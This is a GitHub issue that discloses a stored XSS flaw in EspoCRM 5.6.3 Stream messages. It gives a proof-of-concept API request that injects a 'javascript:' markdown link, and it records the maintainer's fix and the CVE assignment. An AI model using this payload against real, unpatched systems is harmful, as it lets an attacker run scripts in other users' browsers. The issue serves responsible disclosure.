Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Stored XSS in Stream messages #1349

Closed
KhajiitStoleNothing opened this issue Jul 12, 2019 · 2 comments
Closed

Stored XSS in Stream messages #1349

KhajiitStoleNothing opened this issue Jul 12, 2019 · 2 comments
Assignees
Labels
Milestone

Comments

@KhajiitStoleNothing
Copy link

KhajiitStoleNothing commented Jul 12, 2019

Description

Current version of EspoCRM 5.6.3 is vulnerable to stored XSS due to lack of filtration of user-supplied data in Stream messages. Malicious attacker can create specially crafted link, which contains javascript code and assign it to any user in the system. After the link is clicked malicious javascript code will be executed in user browser.

PoC

Make the following request (insert your authentication data and hostname)

POST /api/v1/Note HTTP/1.1
Host: <PASTE YOUR HOSTNAME HERE>
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/json
Authorization: Basic <PASTE YOUR AUTH TOKEN HERE>
Espo-Authorization: <PASTE YOUR AUTH TOKEN HERE>
Espo-Authorization-By-Token: true
X-Requested-With: XMLHttpRequest
Content-Length: 108
Cookie: <PASTE YOUR COOKIE HERE>

{"type":"Post","targetType":"self","post":"[test](javascript:alert(document.domain%29)","attachmentsIds":[]}

Then open the notifications and click the link.
image

@yurikuzn
Copy link
Contributor

Thanks for reporting. FIx: 97bdd22

@yurikuzn yurikuzn added this to the Version 5.6.4 milestone Jul 15, 2019
@yurikuzn yurikuzn self-assigned this Jul 15, 2019
@yurikuzn yurikuzn added the bug label Jul 15, 2019
@yurikuzn yurikuzn changed the title Stored XSS in Stream messages EspoCRM 5.6.3 Stored XSS in Stream messages Jul 15, 2019
@fgeek
Copy link

fgeek commented Aug 7, 2019

This has been assigned https://nvd.nist.gov/vuln/detail/CVE-2019-13643

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

No branches or pull requests

3 participants